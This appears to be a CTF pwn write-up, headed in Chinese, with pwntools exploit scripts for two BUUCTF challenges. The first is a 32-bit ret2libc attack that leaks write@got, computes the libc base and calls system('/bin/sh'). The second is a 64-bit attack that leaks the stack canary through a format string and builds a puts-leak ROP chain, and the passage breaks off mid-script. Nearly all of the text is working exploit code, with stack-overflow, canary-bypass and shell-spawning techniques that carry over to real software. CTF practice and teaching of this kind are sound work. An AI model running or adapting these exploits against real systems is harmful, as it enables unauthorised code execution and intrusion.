BUUCTF pwn水题大赏
铁人三项(第五赛区)_2018_rop
32位栈溢出,利用 write
泄露 libc
exp:
from pwn import*
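context.log_level = 'DEBUG'
p = remote('node3.buuoj.cn', 28788)
# p = process('./2018_rop')
# The offsets below are taken from this libc, so it must be the exact build
# running on the remote side; a different build silently breaks stage 2.
libc = ELF('./libc-2.27.so')
elf = ELF('./2018_rop')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

# Stage 1: fill the 0x88-byte buffer plus the 4-byte saved ebp, then call
# write(1, &write@got, 4) with main as the return address so the program
# loops back and we can overflow a second time.
payload1 = b'a' * 0x88 + b'a' * 4
payload1 += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload1)

# recvn() blocks until exactly 4 bytes arrived; recv(4) may return fewer
# (TCP segment boundary) and u32() would then fail on a short buffer.
# Assumes the leak is the first thing printed after the overflow.
write_addr = u32(p.recvn(4))
print(hex(write_addr))
libc_base = write_addr - libc.sym['write']
# libc is mapped page-aligned; a wrong libc version or a garbled leak shows up
# here as a misaligned base instead of as a silent crash in stage 2.
if libc_base & 0xfff:
    raise RuntimeError('libc base %#x is not page-aligned: bad leak or libc mismatch' % libc_base)
system_addr = libc_base + libc.sym['system']
# next() instead of .next(): works on both Python 2 and 3.
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
print(hex(libc_base))

# Stage 2: system("/bin/sh"). The return-address slot (main) is only a
# placeholder; the shell is what we want, not a clean return.
payload2 = b'a' * 0x88 + b'a' * 4 + p32(system_addr) + p32(main_addr) + p32(binsh)
p.sendline(payload2)
# gdb.attach(p)
p.interactive()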
bjdctf_2020_babyrop
64位栈溢出,利用 puts
泄露 libc
exp:
import re

from pwn import*
from LibcSearcher import*
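context.log_level = 'debug'
p = process('./bjdctf_2020_babyrop2')
# p = remote('node3.buuoj.cn', 27713)
# Hard-coded gadget addresses: these only hold because the binary is loaded
# at a fixed address (no PIE); re-find them (e.g. ROPgadget) if it is rebuilt.
ret = 0x00000000004005f9
pop_rdi = 0x0000000000400993
elf = ELF('./bjdctf_2020_babyrop2')
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
vuln_addr = elf.symbols['vuln']

# Leak the stack canary through the format-string bug (7th argument slot).
p.sendline('%7$p')
p.recvuntil('0x')
# %p prints no leading zeros, so the canary can be 15 hex digits instead of
# 16; int(p.recv(16), 16) would then choke on the byte after the number.
# Take only the leading hex run of whatever arrived.
raw = p.recv(16)
m = re.match(br'[0-9a-fA-F]+', raw)
if m is None:
    raise RuntimeError('no hex value after 0x: %r' % raw)
canary = int(m.group(0), 16)
# The low byte of a glibc x86-64 stack canary is always 0x00; anything else
# means the leak was misparsed and the overflow below would be detected.
if canary & 0xff:
    raise RuntimeError('leaked value %#x does not look like a canary' % canary)
a = canary  # keep the original name: later stages of the script use it
print(hex(a))

# 0x18 bytes of buffer, the canary, 8 bytes of saved rbp, then the chain:
# `ret` keeps the stack 16-byte aligned before the call, puts(puts@got)
# leaks libc, and we return into vuln for a second overflow.
payload1 = b'a' * 0x18 + p64(a) + b'a' * 8
payload1 += p64(ret) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)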
p.sendlineafter('story!'